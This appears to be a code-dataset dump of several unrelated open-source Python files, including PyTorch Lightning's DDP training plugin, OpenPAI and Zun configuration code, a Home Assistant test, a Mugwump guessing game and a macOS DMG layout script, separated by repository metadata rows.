# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'bruges', u'bruges Documentation',
[u'Evan Bianco, Ben Bougher, Matt Hall'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'bruges', u'bruges Documentation',
u'Evan Bianco, Ben Bougher, Matt Hall', 'bruges', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| 31.69863
| 88
| 0.718777
|
3341a39a2d50bb02f68bc28745b5a404f415e392
| 1,976
|
py
|
Python
|
pai-management/paiLibrary/paiBuild/image_tag.py
|
luoch/pai
|
983326061006954bf3b99988d8698704598392e3
|
[
"MIT"
] | 2
|
2018-09-13T11:37:28.000Z
|
2018-09-13T11:39:33.000Z
|
pai-management/paiLibrary/paiBuild/image_tag.py
|
luoch/pai
|
983326061006954bf3b99988d8698704598392e3
|
[
"MIT"
] | null | null | null |
pai-management/paiLibrary/paiBuild/image_tag.py
|
luoch/pai
|
983326061006954bf3b99988d8698704598392e3
|
[
"MIT"
] | 1
|
2018-09-13T11:37:31.000Z
|
2018-09-13T11:37:31.000Z
|
# Copyright (c) Microsoft Corporation
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import logging
import logging.config
from ..common import linux_shell
from ..common import file_handler
from ..common import directory_handler
from ..common import docker_handler
from ..common import template_handler
class image_tag:
def __init__(self, image_name, cluster_object_model, docker_cli):
self.logger = logging.getLogger(__name__)
self.cluster_object_model = cluster_object_model
self.image_name = image_name
self.tag = self.cluster_object_model['clusterinfo']['dockerregistryinfo']['docker_tag']
self.docker_cli = docker_cli
def image_tag(self):
self.logger.info("Tag the {0} to the registry".format(self.image_name))
self.docker_cli.image_tag_to_registry(
self.image_name,
self.tag
)
def run(self):
self.image_tag()
| 35.285714
| 128
| 0.748482
|
647ff764f7c89fd5cfc9365c73713971e19f3b64
| 21,412
|
py
|
Python
|
pytorch_lightning/plugins/training_type/ddp.py
|
moisutsu/pytorch-lightning
|
b294c5760eee30a995fcd400127be209b12c4d7c
|
[
"Apache-2.0"
] | null | null | null |
pytorch_lightning/plugins/training_type/ddp.py
|
moisutsu/pytorch-lightning
|
b294c5760eee30a995fcd400127be209b12c4d7c
|
[
"Apache-2.0"
] | null | null | null |
pytorch_lightning/plugins/training_type/ddp.py
|
moisutsu/pytorch-lightning
|
b294c5760eee30a995fcd400127be209b12c4d7c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import shutil
import signal
import subprocess
import sys
import tempfile
import time
from pathlib import Path
from time import sleep
from typing import Any, Dict, List, Optional, Union
import __main__
import numpy as np
import torch
import torch.distributed
from torch.nn.parallel.distributed import DistributedDataParallel
import pytorch_lightning as pl
from pytorch_lightning.core.optimizer import LightningOptimizer
from pytorch_lightning.distributed import LightningDistributed
from pytorch_lightning.overrides import LightningDistributedModule
from pytorch_lightning.overrides.distributed import prepare_for_backward
from pytorch_lightning.plugins.environments.cluster_environment import ClusterEnvironment
from pytorch_lightning.plugins.io.checkpoint_plugin import CheckpointIO
from pytorch_lightning.plugins.training_type.parallel import ParallelPlugin
from pytorch_lightning.trainer.states import TrainerFn
from pytorch_lightning.utilities import (
_FAIRSCALE_AVAILABLE,
_HYDRA_AVAILABLE,
_TORCH_GREATER_EQUAL_1_7,
_TORCH_GREATER_EQUAL_1_8,
_TORCH_GREATER_EQUAL_1_9,
_TORCH_GREATER_EQUAL_1_10,
rank_zero_deprecation,
rank_zero_warn,
)
from pytorch_lightning.utilities.distributed import (
distributed_available,
init_ddp_connection,
rank_zero_only,
ReduceOp,
sync_ddp_if_available,
)
from pytorch_lightning.utilities.exceptions import DeadlockDetectedException, MisconfigurationException
from pytorch_lightning.utilities.seed import reset_seed
from pytorch_lightning.utilities.types import STEP_OUTPUT
if _TORCH_GREATER_EQUAL_1_10:
from torch.distributed.optim import DistributedOptimizer, PostLocalSGDOptimizer, ZeroRedundancyOptimizer
if _FAIRSCALE_AVAILABLE:
from fairscale.optim import OSS
if _HYDRA_AVAILABLE:
from hydra.core.hydra_config import HydraConfig
from hydra.utils import get_original_cwd, to_absolute_path
if _TORCH_GREATER_EQUAL_1_8:
from pytorch_lightning.utilities.distributed import register_ddp_comm_hook
if _TORCH_GREATER_EQUAL_1_10:
import torch.distributed.algorithms.ddp_comm_hooks.post_localSGD_hook as post_localSGD
import torch.distributed.algorithms.model_averaging.averagers as averagers
log = logging.getLogger(__name__)
class DDPPlugin(ParallelPlugin):
"""Plugin for multi-process single-device training on one or multiple nodes.
The master process in each node spawns N-1 child processes via :func:`subprocess.Popen`, where N is the number of
devices (e.g. GPU) per node. It is very similar to how :mod:`torch.distributed.launch` launches processes.
"""
distributed_backend = "ddp"
def __init__(
self,
parallel_devices: Optional[List[torch.device]] = None,
num_nodes: Optional[int] = None,
cluster_environment: Optional[ClusterEnvironment] = None,
checkpoint_io: Optional[CheckpointIO] = None,
sync_batchnorm: Optional[bool] = None,
ddp_comm_state: Optional[object] = None,
ddp_comm_hook: Optional[callable] = None,
ddp_comm_wrapper: Optional[callable] = None,
model_averaging_period: Optional[int] = None,
**kwargs: Union[Any, Dict[str, Any]],
) -> None:
super().__init__(
parallel_devices=parallel_devices,
cluster_environment=cluster_environment,
checkpoint_io=checkpoint_io,
)
self.interactive_ddp_procs = []
if num_nodes is not None:
rank_zero_deprecation(
"Argument `num_nodes` in `DDPPlugin` is deprecated in v1.4, and will be removed in v1.6."
" Notice that it will be overriden by the trainer setting."
)
self._num_nodes = num_nodes or 1
if sync_batchnorm is not None:
rank_zero_deprecation(
"Argument `sync_batchnorm` in `DDPPlugin` is deprecated in v1.4, and will be removed in v1.6."
" Notice that it will be overriden by the trainer setting."
)
self._sync_batchnorm = sync_batchnorm or False
self.dist = LightningDistributed()
self.num_processes = len(self.parallel_devices) if self.parallel_devices is not None else 0
self._ddp_kwargs = kwargs
self._task_idx = None
self._ddp_comm_state = ddp_comm_state
self._ddp_comm_hook = ddp_comm_hook
self._ddp_comm_wrapper = ddp_comm_wrapper
self._model_averaging_period = model_averaging_period
self._pids: Optional[List[int]] = None
self._sync_dir: Optional[str] = None
self.set_world_ranks()
@property
def is_distributed(self) -> bool:
return True
@property
def root_device(self) -> torch.device:
return self.parallel_devices[self.local_rank]
@property
def num_nodes(self) -> int:
return self._num_nodes
@num_nodes.setter
def num_nodes(self, num_nodes: int) -> None:
# note that world ranks is related to num_nodes, when resetting it, need to reset world ranks
self._num_nodes = num_nodes
self.set_world_ranks()
@property
def sync_batchnorm(self) -> bool:
return self._sync_batchnorm
@sync_batchnorm.setter
def sync_batchnorm(self, sync_batchnorm: bool) -> None:
self._sync_batchnorm = sync_batchnorm
@property
def task_idx(self) -> Optional[int]:
rank_zero_deprecation(
f"`{self.__class__.__name__}.task_idx` is deprecated in v1.4 and will be removed in v1.6. Use "
f"`{self.__class__.__name__}.local_rank` instead."
)
return self._task_idx
@task_idx.setter
def task_idx(self, task_idx: int) -> None:
self._task_idx = task_idx
@property
def distributed_sampler_kwargs(self):
distributed_sampler_kwargs = dict(num_replicas=(self.num_nodes * self.num_processes), rank=self.global_rank)
return distributed_sampler_kwargs
@property
def _is_single_process_single_device(self) -> bool:
return True
def setup_environment(self) -> None:
# start the other scripts
if not self.cluster_environment.creates_children():
self._call_children_scripts()
# set the task idx
self.task_idx = self.cluster_environment.local_rank()
self.setup_distributed()
def _call_children_scripts(self):
# bookkeeping of spawned processes
self._check_can_spawn_children()
# DDP Environment variables
os.environ["MASTER_ADDR"] = self.cluster_environment.master_address()
os.environ["MASTER_PORT"] = str(self.cluster_environment.master_port())
# allow the user to pass the node rank
os.environ["NODE_RANK"] = str(self.cluster_environment.node_rank())
os.environ["LOCAL_RANK"] = str(self.cluster_environment.local_rank())
# Check if the current calling command looked like `python a/b/c.py` or `python -m a.b.c`
# See https://docs.python.org/3/reference/import.html#main-spec
if __main__.__spec__ is None: # pragma: no-cover
# Script called as `python a/b/c.py`
# when user is using hydra find the absolute path
path_lib = os.path.abspath if not _HYDRA_AVAILABLE else to_absolute_path
# pull out the commands used to run the script and resolve the abs file path
command = sys.argv
try:
full_path = path_lib(command[0])
except Exception:
full_path = os.path.abspath(command[0])
command[0] = full_path
# use the same python interpreter and actually running
command = [sys.executable] + command
else: # Script called as `python -m a.b.c`
command = [sys.executable, "-m", __main__.__spec__.name] + sys.argv[1:]
# the visible devices tell us how many GPUs we want to use.
# when the trainer script was called the device has already been scoped by the time
# code reaches this point. so, to call the scripts, we need to leave cuda visible devices alone
# but forward the GPUs selected via environment variables
if self.parallel_devices is None:
raise MisconfigurationException("you selected (distribute_backend = ddp) but did not set Trainer(gpus=?)")
os.environ["WORLD_SIZE"] = f"{self.num_processes * self.num_nodes}"
self.interactive_ddp_procs = []
for local_rank in range(1, self.num_processes):
env_copy = os.environ.copy()
env_copy["LOCAL_RANK"] = f"{local_rank}"
# remove env var if global seed not set
if os.environ.get("PL_GLOBAL_SEED") is None and "PL_GLOBAL_SEED" in env_copy:
del env_copy["PL_GLOBAL_SEED"]
# start process
# if hydra is available and initialized, make sure to set the cwd correctly
cwd: Optional[str] = None
if _HYDRA_AVAILABLE:
if HydraConfig.initialized():
cwd = get_original_cwd()
os_cwd = f'"{os.getcwd()}"'
command += [f"hydra.run.dir={os_cwd}", f"hydra.job.name=train_ddp_process_{local_rank}"]
proc = subprocess.Popen(command, env=env_copy, cwd=cwd)
self.interactive_ddp_procs.append(proc)
# starting all processes at once can cause issues
# with dataloaders delay between 1-10 seconds
delay = np.random.uniform(1, 5, 1)[0]
sleep(delay)
def setup_distributed(self):
reset_seed()
# determine which process we are and world size
self.set_world_ranks()
# set warning rank
rank_zero_only.rank = self.global_rank
# set up server using proc 0's ip address
# try to init for 20 times at max in case ports are taken
# where to store ip_table
init_ddp_connection(self.cluster_environment, self.torch_distributed_backend)
# set the ranks and devices
self.dist.rank = self.global_rank
self.dist.device = self.root_device
def _check_can_spawn_children(self):
if self.local_rank != 0:
raise RuntimeError(
"Lightning attempted to launch new distributed processes with `local_rank > 0`. This should not happen."
" Possible reasons: 1) LOCAL_RANK environment variable was incorrectly modified by the user,"
" 2) `ClusterEnvironment.creates_children()` incorrectly implemented."
)
def set_world_ranks(self) -> None:
if self.cluster_environment is None:
return
self.cluster_environment.set_global_rank(self.node_rank * self.num_processes + self.local_rank)
self.cluster_environment.set_world_size(self.num_nodes * self.num_processes)
rank_zero_only.rank = self.cluster_environment.global_rank()
def pre_configure_ddp(self):
# if unset, default `find_unused_parameters` `True`
# Many models require setting this parameter to True, as there are corner cases
# when not all parameter backward hooks are fired by the autograd engine even if require_grad is set to True.
# This flag does come with a performance hit, so it is suggested to disable in cases where it is possible.
self._ddp_kwargs["find_unused_parameters"] = self._ddp_kwargs.get("find_unused_parameters", True)
# todo: PyTorch 1.7.0 DDP introduces `self.reducer._rebuild_buckets()` breaking manual_optimization
if (
_TORCH_GREATER_EQUAL_1_7
and not self.lightning_module.automatic_optimization
and not self._ddp_kwargs.get("find_unused_parameters", False)
):
rank_zero_warn(
"From PyTorch 1.7.0, Lightning ``manual_optimization`` needs to set ``find_unused_parameters=True`` "
"to properly work with DDP."
)
self._ddp_kwargs["find_unused_parameters"] = True
def _register_ddp_hooks(self) -> None:
# In 1.8, DDP communication hooks only work with NCCL backend and SPSD (single process single device) mode
# Since 1.9, DDP communication hooks can work on all backends.
if _TORCH_GREATER_EQUAL_1_9 or (
_TORCH_GREATER_EQUAL_1_8 and self.on_gpu and self._is_single_process_single_device
):
register_ddp_comm_hook(
model=self._model,
ddp_comm_state=self._ddp_comm_state,
ddp_comm_hook=self._ddp_comm_hook,
ddp_comm_wrapper=self._ddp_comm_wrapper,
)
if (
_TORCH_GREATER_EQUAL_1_10
and isinstance(self._ddp_comm_state, post_localSGD.PostLocalSGDState)
and self.lightning_module.trainer.state.fn == TrainerFn.FITTING
):
self._reinit_optimizers_with_post_localSGD(self._ddp_comm_state.start_localSGD_iter)
def _reinit_optimizers_with_post_localSGD(self, warmup_steps: int):
optimizers = self.lightning_module.trainer.optimizers
if self._model_averaging_period is None:
raise ValueError(
"Post-localSGD algorithm is used, but model averaging period is not provided to DDP plugin."
)
averager = averagers.PeriodicModelAverager(period=self._model_averaging_period, warmup_steps=warmup_steps)
for x, optimizer in enumerate(optimizers):
if isinstance(optimizer, LightningOptimizer):
optimizer = optimizer._optimizer
if (
isinstance(optimizer, DistributedOptimizer)
or isinstance(optimizer, ZeroRedundancyOptimizer)
or (_FAIRSCALE_AVAILABLE and isinstance(optimizer, OSS))
):
raise ValueError(
f"Cannot wrap a distributed optimizer of type {optimizer.__name__} by PostLocalSGDOptimizer."
)
if isinstance(optimizer, PostLocalSGDOptimizer):
continue
optim_class = type(optimizer)
post_localSGD_optimizer = PostLocalSGDOptimizer(
params=optimizer.param_groups,
optimizer_class=optim_class,
averager=averager,
**optimizer.defaults,
)
optimizers[x] = post_localSGD_optimizer
del optimizer
trainer = self.lightning_module.trainer
trainer.optimizers = optimizers
trainer.convert_to_lightning_optimizers()
def configure_ddp(self) -> None:
self.pre_configure_ddp()
self._model = DistributedDataParallel(
LightningDistributedModule(self.model), device_ids=self.determine_ddp_device_ids(), **self._ddp_kwargs
)
self._register_ddp_hooks()
def determine_ddp_device_ids(self):
if self.root_device.type == "cpu":
return None
return [self.root_device.index]
def pre_dispatch(self):
# share ddp pids to all processes
self._share_information_to_prevent_deadlock()
# move the model to the correct device
self.model_to_device()
if self.sync_batchnorm:
self.model = self.configure_sync_batchnorm(self.model)
# skip wrapping the model if we are not fitting as no gradients need to be exchanged
trainer_fn = self.lightning_module.trainer.state.fn
if trainer_fn == TrainerFn.FITTING:
self.configure_ddp()
def post_dispatch(self, trainer: "pl.Trainer") -> None:
self.cluster_environment.teardown()
def barrier(self, *args, **kwargs) -> None:
if not distributed_available():
return
if _TORCH_GREATER_EQUAL_1_8 and torch.distributed.get_backend() == "nccl":
torch.distributed.barrier(device_ids=self.determine_ddp_device_ids())
else:
torch.distributed.barrier()
def broadcast(self, obj: object, src: int = 0) -> object:
return self.dist.broadcast(obj)
def pre_backward(self, closure_loss: torch.Tensor) -> None:
"""Run before precision plugin executes backward."""
if not self.lightning_module.automatic_optimization:
prepare_for_backward(self.model, closure_loss)
def model_to_device(self):
self.model.to(self.root_device)
def reduce(self, tensor, group: Optional[Any] = None, reduce_op: Union[ReduceOp, str] = "mean") -> torch.Tensor:
"""Reduces a tensor from several distributed processes to one aggregated tensor.
Args:
tensor: the tensor to sync and reduce
group: the process group to gather results from. Defaults to all processes (world)
reduce_op: the reduction operation. Defaults to 'mean'/'avg'.
Can also be a string 'sum' to calculate the sum during reduction.
Return:
reduced value, except when the input was not a tensor the output remains is unchanged
"""
if isinstance(tensor, torch.Tensor):
tensor = sync_ddp_if_available(tensor, group, reduce_op=reduce_op)
return tensor
def training_step(self, *args, **kwargs) -> Optional[Any]:
return self.model(*args, **kwargs)
def validation_step(self, *args, **kwargs) -> Optional[STEP_OUTPUT]:
if isinstance(self.model, DistributedDataParallel):
# used when calling `trainer.fit`
return self.model(*args, **kwargs)
else:
# used when calling `trainer.validate`
return self.lightning_module.validation_step(*args, **kwargs)
def test_step(self, *args, **kwargs) -> Optional[STEP_OUTPUT]:
return self.lightning_module.test_step(*args, **kwargs)
def predict_step(self, *args, **kwargs) -> Any:
return self.lightning_module.predict_step(*args, **kwargs)
def post_training_step(self):
if not self.lightning_module.automatic_optimization:
self.model.require_backward_grad_sync = True
@classmethod
def register_plugins(cls, plugin_registry: Dict) -> None:
plugin_registry.register(
"ddp_find_unused_parameters_false",
cls,
description="DDP Plugin with `find_unused_parameters` as False",
find_unused_parameters=False,
)
def _share_information_to_prevent_deadlock(self):
self._share_pids()
# there should be a unique sync_dir per nodes.
if self.local_rank == 0:
# create a temporary directory used to synchronize processes on deadlock.
self._sync_dir = tempfile.mkdtemp()
sync_dirs = []
global_node_rank_zero = 0
for _ in range(self.num_nodes):
sync_dirs.append(self.broadcast(self._sync_dir, global_node_rank_zero))
global_node_rank_zero += self.world_size // self.num_nodes
self._sync_dir = sync_dirs[self.node_rank]
def _share_pids(self):
"""Make all DDP processes aware of all processes pids."""
self.barrier()
pids = self.all_gather(torch.tensor(os.getpid(), device=self.root_device))
pids = pids.cpu().numpy().tolist()
self._pids = pids if isinstance(pids, list) else [pids]
def reconciliate_processes(self, trace: str):
if self.world_size < 2:
return
sync_dir = self._sync_dir
if not sync_dir:
rank_zero_warn("Error handling mechanism for deadlock detection is uninitialized. Skipping check.")
return
# The cluster may be configured to periodically purge the `/tmp`
# directory, in which case `sync_dir` may not exist anymore at this
# point. Idempotently create it to ensure its existence.
Path(sync_dir).mkdir(parents=True, exist_ok=True)
# save a file locally.
torch.save(True, os.path.join(sync_dir, f"{self.global_rank}.pl"))
# sleep for a short time
time.sleep(3)
# return if all processes wrote a file in the `sync_dir`.
# todo (tchaton) Add support for non-shared file-system which will fail.
if len(os.listdir(sync_dir)) == (self.world_size // self.num_nodes):
return
for pid in self._pids:
if pid != os.getpid():
os.kill(pid, signal.SIGKILL)
shutil.rmtree(sync_dir)
raise DeadlockDetectedException(f"DeadLock detected from rank: {self.global_rank} \n {trace}")
def teardown(self) -> None:
if isinstance(self.model, DistributedDataParallel):
self.model = self.lightning_module
if self.on_gpu:
# GPU teardown
self.lightning_module.cpu()
# clean up memory
torch.cuda.empty_cache()
| 41.097889
| 120
| 0.671726
|
c7b3dbc84279231bb9c8dd66ab4e26633c400572
| 1,116
|
py
|
Python
|
tests/components/myq/test_light.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 22,481
|
2020-03-02T13:09:59.000Z
|
2022-03-31T23:34:28.000Z
|
tests/components/myq/test_light.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 31,101
|
2020-03-02T13:00:16.000Z
|
2022-03-31T23:57:36.000Z
|
tests/components/myq/test_light.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 11,411
|
2020-03-02T14:19:20.000Z
|
2022-03-31T22:46:07.000Z
|
"""The scene tests for the myq platform."""
from homeassistant.const import STATE_OFF, STATE_ON
from .util import async_init_integration
async def test_create_lights(hass):
"""Test creation of lights."""
await async_init_integration(hass)
state = hass.states.get("light.garage_door_light_off")
assert state.state == STATE_OFF
expected_attributes = {
"friendly_name": "Garage Door Light Off",
"supported_features": 0,
}
# Only test for a subset of attributes in case
# HA changes the implementation and a new one appears
assert all(
state.attributes[key] == expected_attributes[key] for key in expected_attributes
)
state = hass.states.get("light.garage_door_light_on")
assert state.state == STATE_ON
expected_attributes = {
"friendly_name": "Garage Door Light On",
"supported_features": 0,
}
# Only test for a subset of attributes in case
# HA changes the implementation and a new one appears
assert all(
state.attributes[key] == expected_attributes[key] for key in expected_attributes
)
| 30.162162
| 88
| 0.694444
|
c9c4d292d0f00f4468fe62f0502c48da5e0a1711
| 964
|
py
|
Python
|
samples/py.py
|
mliscourtney/vim256colorschemes
|
17c060fec90fb0afd3b638776277e88935e2f21f
|
[
"MIT"
] | 1
|
2015-12-29T19:56:18.000Z
|
2015-12-29T19:56:18.000Z
|
samples/py.py
|
mliscourtney/vim256colorschemes
|
17c060fec90fb0afd3b638776277e88935e2f21f
|
[
"MIT"
] | null | null | null |
samples/py.py
|
mliscourtney/vim256colorschemes
|
17c060fec90fb0afd3b638776277e88935e2f21f
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import random
random.seed()
mugwump_x = random.randrange(10)
mugwump_y = random.randrange(10)
units_from_mugwump = 1
turn_number = 0
while units_from_mugwump and turn_number < 10:
guess = map(int, raw_input("What is your guess (x y)? ").split())
if not all(0 <= values < 10 for values in guess):
print "Please enter numbers in the range 0 and", 10 - 1
continue
if len(guess) != 2:
print "Please only enter two numbers"
continue
else:
guess_x = guess[0]
guess_y = guess[1]
units_from_mugwump = abs(guess_x - mugwump_x) + abs(guess_y - mugwump_y)
print "You are", units_from_mugwump, "units from the Mugwump."
turn_number += 1
print "Turn number", turn_number
if units_from_mugwump == 0:
print "You win! The Mugwump is at (", mugwump_x, ",", mugwump_y, ")."
else:
print "You lose. The Mugwump is at (", mugwump_x, ",", mugwump_y, ")."
| 32.133333
| 80
| 0.637967
|
93cba62fc9a46bb5cb5c1354c9d545719b7e3849
| 2,091
|
py
|
Python
|
zun-3.0.0/zun/conf/__init__.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | null | null | null |
zun-3.0.0/zun/conf/__init__.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | 5
|
2019-08-14T06:46:03.000Z
|
2021-12-13T20:01:25.000Z
|
zun-3.0.0/zun/conf/__init__.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | 2
|
2020-03-15T01:24:15.000Z
|
2020-07-22T20:34:26.000Z
|
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from zun.conf import api
from zun.conf import availability_zone
from zun.conf import cinder_client
from zun.conf import compute
from zun.conf import container_driver
from zun.conf import database
from zun.conf import docker
from zun.conf import glance_client
from zun.conf import image_driver
from zun.conf import keystone
from zun.conf import netconf
from zun.conf import network
from zun.conf import neutron_client
from zun.conf import path
from zun.conf import pci
from zun.conf import profiler
from zun.conf import quota
from zun.conf import scheduler
from zun.conf import services
from zun.conf import ssl
from zun.conf import utils
from zun.conf import volume
from zun.conf import websocket_proxy
from zun.conf import zun_client
CONF = cfg.CONF
api.register_opts(CONF)
compute.register_opts(CONF)
container_driver.register_opts(CONF)
database.register_opts(CONF)
docker.register_opts(CONF)
glance_client.register_opts(CONF)
image_driver.register_opts(CONF)
keystone.register_opts(CONF)
path.register_opts(CONF)
scheduler.register_opts(CONF)
services.register_opts(CONF)
zun_client.register_opts(CONF)
ssl.register_opts(CONF)
profiler.register_opts(CONF)
neutron_client.register_opts(CONF)
network.register_opts(CONF)
websocket_proxy.register_opts(CONF)
pci.register_opts(CONF)
quota.register_opts(CONF)
volume.register_opts(CONF)
cinder_client.register_opts(CONF)
netconf.register_opts(CONF)
availability_zone.register_opts(CONF)
utils.register_opts(CONF)
| 30.75
| 78
| 0.812052
|
ff920e6b3abe5f46a8ead655592fc7794e61c8d1
| 3,717
|
py
|
Python
|
contrib/macdeploy/custom_dsstore.py
|
Apiocoin/litecoin
|
779be6dc6f0fa3f8c8eefad4cd487f2f9f9e3c69
|
[
"MIT"
] | 3
|
2021-06-08T00:07:01.000Z
|
2021-06-09T17:53:44.000Z
|
contrib/macdeploy/custom_dsstore.py
|
Apiocoin/litecoin
|
779be6dc6f0fa3f8c8eefad4cd487f2f9f9e3c69
|
[
"MIT"
] | null | null | null |
contrib/macdeploy/custom_dsstore.py
|
Apiocoin/litecoin
|
779be6dc6f0fa3f8c8eefad4cd487f2f9f9e3c69
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2013-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import biplist
from ds_store import DSStore
from mac_alias import Alias
import sys
output_file = sys.argv[1]
package_name_ns = sys.argv[2]
ds = DSStore.open(output_file, 'w+')
ds['.']['bwsp'] = {
'ShowStatusBar': False,
'WindowBounds': '{{300, 280}, {500, 343}}',
'ContainerShowSidebar': False,
'SidebarWidth': 0,
'ShowTabView': False,
'PreviewPaneVisibility': False,
'ShowToolbar': False,
'ShowSidebar': False,
'ShowPathbar': True
}
icvp = {
'gridOffsetX': 0.0,
'textSize': 12.0,
'viewOptionsVersion': 1,
'backgroundImageAlias': b'\x00\x00\x00\x00\x02\x1e\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd1\x94\\\xb0H+\x00\x05\x00\x00\x00\x98\x0fbackground.tiff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x99\xd19\xb0\xf8\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\r\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b.background\x00\x00\x10\x00\x08\x00\x00\xd1\x94\\\xb0\x00\x00\x00\x11\x00\x08\x00\x00\xd19\xb0\xf8\x00\x00\x00\x01\x00\x04\x00\x00\x00\x98\x00\x0e\x00 \x00\x0f\x00b\x00a\x00c\x00k\x00g\x00r\x00o\x00u\x00n\x00d\x00.\x00t\x00i\x00f\x00f\x00\x0f\x00\x02\x00\x00\x00\x12\x00\x1c/.background/background.tiff\x00\x14\x01\x06\x00\x00\x00\x00\x01\x06\x00\x02\x00\x00\x0cMacintosh HD\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xce\x97\xab\xc3H+\x00\x00\x01\x88[\x88\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02u\xab\x8d\xd1\x94\\\xb0devrddsk\xff\xff\xff\xff\x00\x00\t \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07bitcoin\x00\x00\x10\x00\x08\x00\x00\xce\x97\xab\xc3\x00\x00\x00\x11\x00\x08\x00\x00\xd1\x94\\\xb0\x00\x00\x00\x01\x00\x14\x01\x88[\x88\x00\x16\xa9\t\x00\x08\xfaR\x00\x08\xfaQ\x00\x02d\x8e\x00\x0e\x00\x02\x00\x00\x00\x0f\x00\x1a\x00\x0c\x00M\x00a\x00c\x00i\x00n\x00t\x00o\x00s\x00h\x00 \x00H\x00D\x00\x13\x00\x01/\x00\x00\x15\x00\x02\x00\x14\xff\xff\x00\x00\xff\xff\x00\x00',
'backgroundColorBlue': 1.0,
'iconSize': 96.0,
'backgroundColorGreen': 1.0,
'arrangeBy': 'none',
'showIconPreview': True,
'gridSpacing': 100.0,
'gridOffsetY': 0.0,
'showItemInfo': False,
'labelOnBottom': True,
'backgroundType': 2,
'backgroundColorRed': 1.0
}
alias = Alias.from_bytes(icvp['backgroundImageAlias'])
alias.volume.name = package_name_ns
alias.volume.posix_path = '/Volumes/' + package_name_ns
alias.volume.disk_image_alias.target.filename = package_name_ns + '.temp.dmg'
alias.volume.disk_image_alias.target.carbon_path = 'Macintosh HD:Users:\x00apiocoinuser:\x00Documents:\x00apiocoin:\x00apiocoin:\x00' + package_name_ns + '.temp.dmg'
alias.volume.disk_image_alias.target.posix_path = 'Users/apiocoinuser/Documents/apiocoin/apiocoin/' + package_name_ns + '.temp.dmg'
alias.target.carbon_path = package_name_ns + ':.background:\x00background.tiff'
icvp['backgroundImageAlias'] = biplist.Data(alias.to_bytes())
ds['.']['icvp'] = icvp
ds['.']['vSrn'] = ('long', 1)
ds['Applications']['Iloc'] = (370, 156)
